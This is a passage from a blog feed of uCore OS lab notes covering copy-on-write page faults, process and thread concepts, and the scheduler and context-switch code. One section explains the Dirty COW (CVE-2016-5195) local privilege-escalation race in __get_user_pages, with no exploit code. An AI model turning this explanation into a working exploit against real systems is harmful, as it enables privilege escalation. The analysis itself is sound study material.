class="built_in">page2kva</span>(newPage);</span><br><span class="line">                <span class="comment">// copy the data</span></span><br><span class="line">                <span class="built_in">memcpy</span>(kva_dst, kva_src, PGSIZE);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="comment">// otherwise the physical page is referenced only by the current process, i.e. page_ref equals 1</span></span><br><span class="line">            <span class="keyword">else</span></span><br><span class="line">                <span class="comment">// so call page_insert directly: keep the current physical page and reset its PTE permissions</span></span><br><span class="line">                <span class="built_in">page_insert</span>(mm-&gt;pgdir, page, addr, perm);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">        &#123;</span><br><span class="line">            <span class="comment">// if swap has been initialized</span></span><br><span class="line">            <span class="keyword">if</span>(swap_init_ok) &#123;</span><br><span class="line">                <span class="comment">// load the target data into a new physical page</span></span><br><span class="line">                <span class="comment">// that page may be a not-yet-allocated page, or one taken from another allocated page</span></span><br><span class="line">                <span class="keyword">if</span> ((ret = <span class="built_in">swap_in</span>(mm, addr, &amp;page)) != <span class="number">0</span>) &#123;</span><br><span class="line">                    <span class="built_in">cprintf</span>(<span class="string">&quot;swap_in in do_pgfault failed\n&quot;</span>);</span><br><span class="line">                    <span class="keyword">goto</span> failed;</span><br><span class="line">                &#125;</span><br><span class="line">                <span class="comment">// map the physical page at the virtual address and update the page table</span></span><br><span class="line">                <span class="built_in">page_insert</span>(mm-&gt;pgdir, page, addr, perm);</span><br><span class="line">            
&#125;</span><br><span class="line">            <span class="keyword">else</span> &#123;</span><br><span class="line">                <span class="built_in">cprintf</span>(<span class="string">&quot;no swap_init_ok but ptep is %x, failed\n&quot;</span>,*ptep);</span><br><span class="line">                <span class="keyword">goto</span> failed;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// the missing page is back in memory, so mark it as swappable</span></span><br><span class="line">        <span class="built_in">swap_map_swappable</span>(mm, addr, page, <span class="number">1</span>);</span><br><span class="line">        page-&gt;pra_vaddr = addr;</span><br><span class="line">   &#125;</span><br><span class="line">   ret = <span class="number">0</span>;</span><br><span class="line">failed:</span><br><span class="line">    <span class="keyword">return</span> ret;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>This COW implementation works well and passes the <code>make grade</code> tests.</p></li></ul><h4 id="3-脏牛本地提权漏洞分析">3. 
Dirty COW Local Privilege Escalation Analysis</h4><blockquote><p>I only summarize this vulnerability briefly here and skip most of the details. For more, see <a href="https://github.com/qy7tt/blog/blob/master/20161124-%E8%A7%A3%E8%AF%BBCVE-2016-5195-Dirty-COW-Linux%E6%9C%AC%E5%9C%B0%E6%8F%90%E6%9D%83%E6%BC%8F%E6%B4%9E.md">解读CVE-2016-5195(Dirty COW)Linux本地提权漏洞</a>.</p></blockquote><ul><li><p>First, the code of the vulnerable function:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">long</span> __get_user_pages(<span class="keyword">struct</span> task_struct *tsk, <span class="keyword">struct</span> mm_struct *mm,</span><br><span class="line">        <span class="type">unsigned</span> <span class="type">long</span> start, <span class="type">unsigned</span> <span class="type">long</span> nr_pages,</span><br><span class="line">        <span class="type">unsigned</span> <span class="type">int</span> gup_flags, <span class="keyword">struct</span> page **pages,</span><br><span class="line">        <span class="keyword">struct</span> vm_area_struct **vmas, <span class="type">int</span> *nonblocking)</span><br><span class="line">&#123;</span><br><span class="line">    <span 
class="comment">// ....</span></span><br><span class="line">  <span class="keyword">do</span> &#123;</span><br><span class="line">retry:</span><br><span class="line">        <span class="comment">// note the rescheduling point here</span></span><br><span class="line">        <span class="built_in">cond_resched</span>();</span><br><span class="line">        <span class="comment">// ......</span></span><br><span class="line">        <span class="comment">/* look up the page for the virtual address */</span></span><br><span class="line">        page = <span class="built_in">follow_page_mask</span>(vma, start, foll_flags, &amp;page_mask);</span><br><span class="line">        <span class="keyword">if</span> (!page) &#123;</span><br><span class="line">            <span class="comment">/* if the page is not found, handle the fault */</span></span><br><span class="line">            ret = <span class="built_in">faultin_page</span>(tsk, vma, start, &amp;foll_flags, nonblocking);</span><br><span class="line">            <span class="keyword">switch</span> (ret) &#123;</span><br><span class="line">            <span class="keyword">case</span> <span class="number">0</span>:</span><br><span class="line">                <span class="keyword">goto</span> retry;</span><br><span class="line">            <span class="comment">// ......</span></span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (page)</span><br><span class="line">          <span class="comment">// add it to the pages array</span></span><br><span class="line">    &#125; <span class="keyword">while</span> (nr_pages);</span><br><span class="line">    <span class="comment">// ...</span></span><br><span 
class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>执行<code>__get_user_pages</code>函数时，函数参数会携带一个<code>FOLL_WRITE</code>标记，用以指明当前操作是写入某个物理页。</p></li><li><p>在<code>follow_page_mask</code>中，程序会找出特定的物理页。但大部分情况下第一次执行该函数时无法真正将该物理页的地址返回，因为可能存在缺页或者权限不够的情况（例如写入了一个只读页）。</p></li><li><p>此时，变量<code>page</code>的值为<code>NULL</code>，之后会执行<code>faultin_page</code>函数对<code>follow_page_mask</code>的失败进行处理。包括但不限于分配新的页、修改页权限、页数据复制等等情况（上述说明的三种情况不一定会同时发生）。然后跳转至<code>retry</code>重新执行<code>follow_page_mask</code>。</p></li><li><p>经过几轮的循环后，当<code>faultin_page</code>函数再一次执行时，该函数会执行内存复制操作，以完成写时复制操作。同时  <strong><code>FOLL_WRITE</code>标记将会被抹去</strong>  ，之后<strong>跳转回<code>retry</code></strong>。</p><blockquote><p>因为COW已经执行完成，对于新的物理页无论是读还是写都没有问题，所以在下一次执行<code>follow_page_mask</code>函数时一定会返回该物理页，所以该标记已经失去了作用，可以被抹去。</p></blockquote></li><li><p>但此时需要注意的是，<code>retry</code>下的第一条语句是<code>cond_resched</code>函数，它将会执行<strong>线程调度</strong>，执行其他线程。但倘若<strong>调度到的线程将之前新创建的物理页删除</strong>，则一旦重新调度回当前线程后，执行<code>follow_page_mask</code>返回的是<strong>之前的只读页</strong>。</p><blockquote><p>为什么第一次执行<code>follow_page_mask</code>时返回NULL，而这一次执行返回的是只读页呢？</p><p>因为第一次执行时有<code>FOLL_WRITE</code>标记，权限不够，所以会返回NULL。而这次的执行由于不存在<code>FOLL_WRITE</code>标记，所以该操作会被认定为读取而不是写入，因此直接返回之前的<strong>只读物理页</strong>的地址。</p></blockquote></li><li><p>之后该<strong>只读</strong>页被添加到page数组，并在接下来的操作中被<strong>成功修改</strong>。这就是脏牛漏洞的大致原理。</p></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;简介&quot;&gt;简介&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;这里是笔者在完成&lt;code&gt;uCore&lt;/code&gt; Lab 5时写下的一些笔记&lt;/li&gt;
&lt;li&gt;内容涉及&lt;code&gt;fork/exec/wait/exit&lt;/code&gt;机制的具体实现。&lt;/li&gt;&lt;/ul&gt;</summary>
    
    
    
    <category term="天问之路" scheme="https://kiprey.github.io/categories/%E5%A4%A9%E9%97%AE%E4%B9%8B%E8%B7%AF/"/>
    
    
    <category term="uCore" scheme="https://kiprey.github.io/tags/uCore/"/>
    
    <category term="OS" scheme="https://kiprey.github.io/tags/OS/"/>
    
  </entry>
  
  <entry>
    <title>uCore实验 - Lab4</title>
    <link href="https://kiprey.github.io/2020/08/uCore-4/"/>
    <id>https://kiprey.github.io/2020/08/uCore-4/</id>
    <published>2020-08-17T09:35:38.000Z</published>
    <updated>2025-11-24T03:59:40.150Z</updated>
    
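    <content type="html"><![CDATA[<h2 id="简介">Introduction</h2><ul><li>These are notes I wrote while completing <code>uCore</code> Lab 4.</li><li>They cover process and thread management, among other topics.</li><li>The post is long, so using the navigation bar on the right is recommended.</li></ul><span id="more"></span><h2 id="知识点">Key Concepts</h2><h3 id="1-进程">1. Processes</h3><h4 id="1-概念">1) Concept</h4><ul><li><p>A process is one <strong>dynamic execution</strong> of a program with some <strong>independent function</strong> over a <strong>set of data</strong>, including <strong>all the state information</strong> of the running program.</p></li><li><p>A process is a program in execution; it runs in kernel mode or user mode and is a sequence of state changes.</p></li><li><p>A process consists of the program, its data blocks, and a <strong>process control block (PCB)</strong>.</p></li></ul><h4 id="2-进程控制块">2) Process Control Block</h4><blockquote><p>Process Control Block, PCB.</p></blockquote><ul><li>The process control block is <strong>the set of information the operating system uses to manage and control a running process</strong>. The operating system uses the PCB to describe <strong>the basic facts about a process and how its execution changes over time</strong>.</li><li><strong>The PCB is the sole marker that a process exists</strong>; every process has a corresponding PCB in the operating system.</li><li>PCBs can be organized with some data structure, such as a linked list. The PCBs of processes in the same state are linked into one list, and different states map to different lists: a ready list, a blocked list, and so on.</li></ul><h4 id="3-进程状态">3) Process States</h4><p>A process's life cycle typically involves six events: <strong>creation, running, waiting, preemption, wake-up, and termination</strong>.</p><blockquote><p>Some of these are not marked in the figure.</p></blockquote><p><img src="/2020/08/uCore-4/processStatus.png" alt="img"></p><ul><li><p>Situations that cause process creation:</p><ul><li>System initialization, which creates the idle process.</li><li>A user or a running process requests the creation of a new process.</li></ul></li><li><p>Situations in which a process waits (blocks):</p><ul><li>The process requests and waits for a system service that cannot complete immediately.</li><li>It starts an operation that cannot complete immediately.</li><li>The data it needs has not arrived.</li></ul><blockquote><p>Only the process itself can put itself to sleep, but only something external (for example the operating system) can wake a sleeping process.</p></blockquote></li><li><p>Situations that cause a process to be preempted:</p><ul><li>A higher-priority process becomes ready.</li><li>The process has used up its current time slice.</li></ul></li><li><p>Situations in which a process is woken up:</p><ul><li>The resource the blocked process needs becomes available.</li><li>The event the blocked process is waiting for arrives.</li></ul><blockquote><p>A process can only be woken by another process or by the operating system.</p></blockquote></li><li><p>Situations in which a process terminates:</p><ul><li>Normal or abnormal exit (voluntary).</li><li>A fatal error (forced, for example SIGSEGV).</li><li>Being <code>kill</code>ed by another process (forced).</li></ul></li></ul><h4 id="4-进程挂起">4) Process Suspension</h4><blockquote><p>The image of a suspended process is kept on disk in order to reduce the memory that processes occupy.</p></blockquote><p>The model is shown below.</p><p><img src="/2020/08/uCore-4/suspendProcessStatus.png" alt="img"><br>A brief description of the states and transitions follows.</p><ul><li>Blocked-suspend: 
the process is in external storage and waiting for some event.</li><li>Ready-suspend: the process is in external storage, but can run as soon as it is brought into memory.</li><li>Suspend: move a process from memory to external storage.<ul><li>Blocked to blocked-suspend: no process is ready, or the ready processes need more memory.</li><li>Ready to ready-suspend: when a high-priority process is blocked (and the system expects it to become ready soon), a low-priority ready process is suspended to free more memory for the high-priority one.</li><li>Running to ready-suspend: when a high-priority waiting process enters ready-suspend because its event has occurred.</li><li>Blocked-suspend to ready-suspend: when the event a blocked-suspend process was waiting for occurs.</li></ul></li><li>Activate: move a process from external storage into memory.<ul><li>Ready-suspend to ready: there is no ready process, or the ready-suspend process has higher priority than the ready processes.</li><li>Blocked-suspend to blocked: a process has released enough memory and there is a high-priority blocked-suspend process.</li></ul></li></ul><h3 id="2-线程">2. Threads</h3><h4 id="1-概念-2">1) Concept</h4><p>A thread is part of a process. It describes the execution state of an instruction stream, is the smallest unit of instruction execution within a process, and is the basic unit of CPU scheduling.</p><blockquote><p>The process as the unit of resource allocation: a process is made up of a set of related resources, including its address space, open files, and so on.</p><p>The thread as the unit of processor scheduling: a thread describes the execution state of an instruction stream within the resource environment of its process.</p></blockquote><h4 id="2-优缺点">2) Pros and Cons</h4><ul><li>Advantages:<ul><li>A process can contain multiple threads.</li><li>The threads can execute concurrently.</li><li>The threads can share resources such as the address space and files.</li></ul></li><li>Disadvantages:<ul><li>If one thread crashes, every thread in its process crashes with it.</li></ul></li></ul><h4 id="3-用户线程与内核线程">3) User Threads and Kernel Threads</h4><p>Threads can be implemented in three ways:</p><ul><li>User threads: implemented in user space. (POSIX Pthread)</li><li>Kernel threads: implemented in the kernel. (Windows, Linux)</li><li>Lightweight <strong>processes</strong>: implemented in the kernel, supporting user threads.</li></ul><h5 id="a-用户线程">a. User Threads</h5><blockquote><p>User threads are managed by a set of user-level thread library functions, which handle thread creation, termination, synchronization, scheduling, and so on.</p></blockquote><ul><li>Characteristics of user threads<ul><li>They do not depend on the operating system kernel; the threading mechanism is implemented in user space.<ul><li>They can be used on multi-process operating systems that do not support threads.</li><li>The thread control block (TCB) is maintained internally by the thread library.</li></ul></li><li>Switching between user threads of the same process is fast, with no user-mode/kernel-mode transition.</li><li>Each process can have its own thread scheduling algorithm.</li></ul></li><li>Drawbacks of user threads<ul><li>When a thread blocks in a system call, the whole process enters the waiting state.</li><li>Thread-based processor preemption is not supported.</li><li>CPU time can only be allocated per process.</li></ul></li></ul><h5 id="b-内核线程">b. Kernel Threads</h5><blockquote><p>Kernel threads are a threading mechanism that the kernel provides through system calls; the kernel handles thread creation, termination, and management.</p></blockquote><p>Characteristics of kernel threads</p><ul><li>The kernel itself maintains the PCBs and TCBs.</li><li>A thread that blocks in a system call does not affect other threads.</li><li>Creating, terminating, and switching threads is relatively expensive.</li><li>CPU time is allocated per thread, so a multi-threaded process can obtain more CPU time.</li></ul><h5 id="c-轻权进程">c. 
Lightweight Processes</h5><blockquote><p>User threads allow custom scheduling algorithms but have some drawbacks, while kernel threads avoid those drawbacks.</p><p>Lightweight processes are therefore a combination of user threads and kernel threads.</p></blockquote><ul><li><p>They are user threads supported by the kernel. A process can contain one or more lightweight processes, each backed by its own kernel thread.</p></li><li><p>The design proved too complex for its advantages to show, and it eventually evolved into plain kernel-thread support. Its model is shown below:</p><p><img src="/2020/08/uCore-4/LightWeightProcess.png" alt="img"></p></li></ul><h3 id="3-线程与进程的比较">3. Threads versus Processes</h3><ul><li>A process is the unit of resource allocation, while a thread is the unit of CPU scheduling.</li><li>A process owns a complete resource platform, while a thread exclusively owns only the resources needed to execute its instruction stream, such as registers and a stack.</li><li>A thread has three basic states (ready, waiting, and running) and transitions between them.</li><li>Threads reduce the time and space overhead of concurrent execution.<ul><li>Creating and terminating a thread takes less time than for a process.</li><li>Switching between threads of the same process takes less time than switching processes.</li><li>Threads of the same process share memory and file resources, so they can communicate directly without going through the kernel.</li></ul></li></ul><h3 id="4-进程控制">4. Process Control</h3><h4 id="1-进程切换">1) Process Switching</h4><h5 id="a-过程">a. Procedure</h5><ul><li>Pause the current process, save its context, and move it from the running state to another state.</li><li>Then schedule another process, restore its context, and move it from the ready state to the running state.</li></ul><blockquote><p>The requirement for process switching: <strong>it must be fast</strong>.</p></blockquote><h5 id="b-进程控制块PCB">b. The Process Control Block (PCB)</h5><blockquote><p>Process switching involves the <strong>process control block (PCB) structure</strong>.</p></blockquote><ul><li><p>The kernel maintains a process control block (PCB) for every process.</p></li><li><p>The kernel places the PCBs of processes in the same state on the same queue.</p></li><li><p>The PCB structure in uCore is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span 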
class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">enum</span> <span class="title class_">proc_state</span> &#123;</span><br><span class="line">    PROC_UNINIT = <span class="number">0</span>,  <span class="comment">// uninitialized     -- alloc_proc</span></span><br><span class="line">    PROC_SLEEPING,    <span class="comment">// waiting           -- try_free_pages, do_wait, do_sleep</span></span><br><span class="line">    PROC_RUNNABLE,    <span class="comment">// ready or running  -- proc_init, wakeup_proc,</span></span><br><span class="line">    PROC_ZOMBIE,      <span class="comment">// zombie            -- do_exit</span></span><br><span class="line">&#125;;</span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">context</span> &#123;  <span class="comment">// saved context registers; note that eax and the segment registers are not included</span></span><br><span class="line">    <span class="type">uint32_t</span> eip;</span><br><span class="line">    <span class="type">uint32_t</span> esp;</span><br><span class="line">    <span class="type">uint32_t</span> ebx;</span><br><span class="line">    <span class="type">uint32_t</span> ecx;</span><br><span class="line">    <span class="type">uint32_t</span> edx;</span><br><span class="line">    <span class="type">uint32_t</span> esi;</span><br><span class="line">    <span class="type">uint32_t</span> edi;</span><br><span class="line">    <span class="type">uint32_t</span> ebp;</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">proc_struct</span> &#123;</span><br><span class="line">    <span class="keyword">enum</span> <span class="title class_">proc_state</span> state;          <span class="comment">// state of this process</span></span><br><span class="line">    <span class="type">int</span> pid;   
                     <span class="comment">// process ID</span></span><br><span class="line">    <span class="type">int</span> runs;                       <span class="comment">// number of times this process has been scheduled</span></span><br><span class="line">    <span class="type">uintptr_t</span> kstack;               <span class="comment">// kernel stack</span></span><br><span class="line">    <span class="keyword">volatile</span> <span class="type">bool</span> need_resched;     <span class="comment">// whether a reschedule is needed</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *parent;     <span class="comment">// parent process (pointer to its PCB)</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">mm_struct</span> *mm;           <span class="comment">// virtual memory managed by this process, including its page directory</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">context</span> context;         <span class="comment">// saved context</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">trapframe</span> *tf;           <span class="comment">// context saved on an interrupt (trap frame)</span></span><br><span class="line">    <span class="type">uintptr_t</span> cr3;                  <span class="comment">// address of the page directory table</span></span><br><span class="line">    <span class="type">uint32_t</span> flags;                 <span class="comment">// flags of this process</span></span><br><span class="line">    <span class="type">char</span> name[PROC_NAME_LEN + <span class="number">1</span>];   <span class="comment">// process name (executable file name)</span></span><br><span class="line">    <span class="type">list_entry_t</span> list_link;         <span class="comment">// link in the process list</span></span><br><span class="line">    <span class="type">list_entry_t</span> hash_link;         <span class="comment">// link in the hash list</span></span><br><span 
class="line">&#125;;</span><br></pre></td></tr></table></figure><p>由于进程数量可能较大，倘若从头向后遍历查找符合某个状态的PCB，则效率会十分低下，因此使用了哈希表作为遍历所用的数据结构。</p></li></ul><h5 id="c-切换流程">c. 切换流程</h5><ul><li><p>uCore中，内核的第一个进程<code>idleproc</code>会执行<code>cpu_idle</code>函数，并从中调用<code>schedule</code>函数，准备开始调度进程。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">cpu_idle</span><span class="params">(<span class="type">void</span>)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">while</span> (<span class="number">1</span>)</span><br><span class="line">        <span class="keyword">if</span> (current-&gt;need_resched)</span><br><span class="line">            <span class="built_in">schedule</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>schedule</code>函数会先清除调度标志，并从当前进程在链表中的位置开始，遍历进程控制块，直到找出处于<strong>就绪状态</strong>的进程。</p><p>之后执行<code>proc_run</code>函数，将环境切换至该进程的上下文并继续执行。</p><blockquote><p>需要注意的是，这个进程调度过程中不能被CPU中断给打断，原因是这可能造成条件竞争。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span 
class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">schedule</span><span class="params">(<span class="type">void</span>)</span> </span>&#123;</span><br><span class="line">    <span class="type">bool</span> intr_flag;</span><br><span class="line">    <span class="type">list_entry_t</span> *le, *last;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *next = <span class="literal">NULL</span>;</span><br><span class="line">    <span class="built_in">local_intr_save</span>(intr_flag);</span><br><span class="line">    &#123;</span><br><span class="line">        current-&gt;need_resched = <span class="number">0</span>;</span><br><span class="line">        last = (current == idleproc) ? 
&amp;proc_list : &amp;(current-&gt;list_link);</span><br><span class="line">        le = last;</span><br><span class="line">        <span class="keyword">do</span> &#123;</span><br><span class="line">            <span class="keyword">if</span> ((le = <span class="built_in">list_next</span>(le)) != &amp;proc_list) &#123;</span><br><span class="line">                next = <span class="built_in">le2proc</span>(le, list_link);</span><br><span class="line">                <span class="keyword">if</span> (next-&gt;state == PROC_RUNNABLE)</span><br><span class="line">                    <span class="keyword">break</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125; <span class="keyword">while</span> (le != last);</span><br><span class="line">        <span class="keyword">if</span> (next == <span class="literal">NULL</span> || next-&gt;state != PROC_RUNNABLE)</span><br><span class="line">            next = idleproc;</span><br><span class="line">        next-&gt;runs ++;</span><br><span class="line">        <span class="keyword">if</span> (next != current)</span><br><span class="line">            <span class="built_in">proc_run</span>(next);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">local_intr_restore</span>(intr_flag);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>proc_run</code> sets the ring0 kernel stack address in the TSS and loads the address of the page directory table. Once these preparations are done, it performs the context switch.</p><blockquote><p>Likewise, critical operations such as setting the kernel stack address and loading the page directory must not be interrupted.</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span 
class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">proc_run</span><span class="params">(<span class="keyword">struct</span> proc_struct *proc)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (proc != current) &#123;</span><br><span class="line">        <span class="type">bool</span> intr_flag;</span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *prev = current, *next = proc;</span><br><span class="line">        <span class="built_in">local_intr_save</span>(intr_flag);</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="comment">// set the currently running process</span></span><br><span class="line">            current = proc;</span><br><span class="line">            <span class="comment">// set the ring0 kernel stack address</span></span><br><span class="line">            <span class="built_in">load_esp0</span>(next-&gt;kstack + KSTACKSIZE);</span><br><span class="line">            <span class="comment">// load the page directory table</span></span><br><span class="line">            <span class="built_in">lcr3</span>(next-&gt;cr3);</span><br><span class="line">            <span class="comment">// switch context</span></span><br><span class="line">            switch_to(&amp;(prev-&gt;context), &amp;(next-&gt;context));</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="built_in">local_intr_restore</span>(intr_flag);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>A context switch works almost entirely with registers, so <code>switch_to</code> is written in assembly; the details are given as comments in the code.</p><figure class="highlight 
mipsasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">.text</span></span><br><span class="line">.globl <span class="keyword">switch_to</span></span><br><span class="line"><span class="keyword"></span><span class="keyword">switch_to: </span>                     <span class="comment"># switch_to(from, to)</span></span><br><span class="line">    <span class="comment"># save from&#x27;s registers</span></span><br><span class="line">    movl <span class="number">4</span>(%esp), %eax          <span class="comment"># get the address of the current process context</span></span><br><span class="line">    popl <span class="number">0</span>(%eax)                <span class="comment"># save eip (the return address) into the current context</span></span><br><span class="line">    movl %esp, <span class="number">4</span>(%eax)          <span class="comment"># save esp into the current context</span></span><br><span class="line">    movl %ebx, <span class="number">8</span>(%eax)          <span class="comment"># save ebx into the current context</span></span><br><span class="line">    movl %ecx, <span class="number">12</span>(%eax)         <span class="comment"># 
save ecx into the current context</span></span><br><span class="line">    movl %edx, <span class="number">16</span>(%eax)         <span class="comment"># save edx into the current context</span></span><br><span class="line">    movl %esi, <span class="number">20</span>(%eax)         <span class="comment"># save esi into the current context</span></span><br><span class="line">    movl %edi, <span class="number">24</span>(%eax)         <span class="comment"># save edi into the current context</span></span><br><span class="line">    movl %ebp, <span class="number">28</span>(%eax)         <span class="comment"># save ebp into the current context</span></span><br><span class="line"></span><br><span class="line">    <span class="comment"># restore to&#x27;s registers</span></span><br><span class="line">    movl <span class="number">4</span>(%esp), %eax          <span class="comment"># get the address of the next process context</span></span><br><span class="line">                                <span class="comment"># note: it is at 4(%esp), not 8(%esp), because the return address was already popped</span></span><br><span class="line">    movl <span class="number">28</span>(%eax), %ebp         <span class="comment"># restore ebp from the next context</span></span><br><span class="line">    movl <span class="number">24</span>(%eax), %edi         <span class="comment"># restore edi from the next context</span></span><br><span class="line">    movl <span class="number">20</span>(%eax), %esi         <span class="comment"># restore esi from the next context</span></span><br><span class="line">    movl <span class="number">16</span>(%eax), %edx         <span class="comment"># restore edx from the next context</span></span><br><span class="line">    movl <span class="number">12</span>(%eax), %ecx         <span class="comment"># restore ecx from the next context</span></span><br><span class="line">    movl <span class="number">8</span>(%eax), %ebx          <span class="comment"># restore ebx from the next context</span></span><br><span class="line">    movl <span class="number">4</span>(%eax), %esp          <span class="comment"># restore esp from the next context</span></span><br><span 
class="line">    pushl <span class="number">0</span>(%eax)               <span class="comment"># push the eip of the next process so that ret jumps to its code</span></span><br><span class="line">    ret</span><br></pre></td></tr></table></figure></li></ul><h4 id="2-进程创建">2) Process creation</h4><ul><li><p>In Unix, a process creates a new process through the <code>fork</code> and <code>exec</code> system calls.</p><ul><li><code>fork</code> duplicates a process into two processes that are <strong>identical except for their PIDs</strong>.</li><li><code>exec</code> overwrites the current process with a new program; the PID does not change.</li></ul></li><li><p><code>fork</code> creates a child that inherits from its parent. The child gets a copy of all of the parent's variables and memory, and of all of the parent's CPU registers (except for one special register, which differs so that the code can tell whether it is running in the child or in the parent).</p></li><li><p><code>fork</code> is called once but returns twice: in the parent it returns the PID of the child, and in the child it returns 0.</p></li><li><p><code>fork</code> is <strong>very expensive</strong>. Its cost comes from</p><ul><li>allocating memory for the child;</li><li>copying the parent's memory and registers into the child.</li></ul><p>Moreover, in most cases <code>fork</code> is followed immediately by <code>exec</code>, which makes the memory copy done in <code>fork</code> wasted work. For this reason <code>fork</code> uses <strong>Copy on Write (COW)</strong>.</p></li></ul><h5 id="a-空闲进程的创建">a. Creating the idle process</h5><ul><li><p>The idle process is mainly responsible for initializing the kernel subsystems and, once that is done, for scheduling other processes. It ends up looping forever in <code>cpu_idle</code>, checking whether a reschedule is needed.</p></li><li><p>Because this process exists only to hand the CPU over to other processes, its <code>need_resched</code> member is initialized to 1.</p></li><li><p>The uCore source that creates the idle process is shown below.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// allocate a proc_struct</span></span><br><span class="line"><span class="keyword">if</span> ((idleproc = <span class="built_in">alloc_proc</span>()) == <span class="literal">NULL</span>)</span><br><span class="line">    <span 
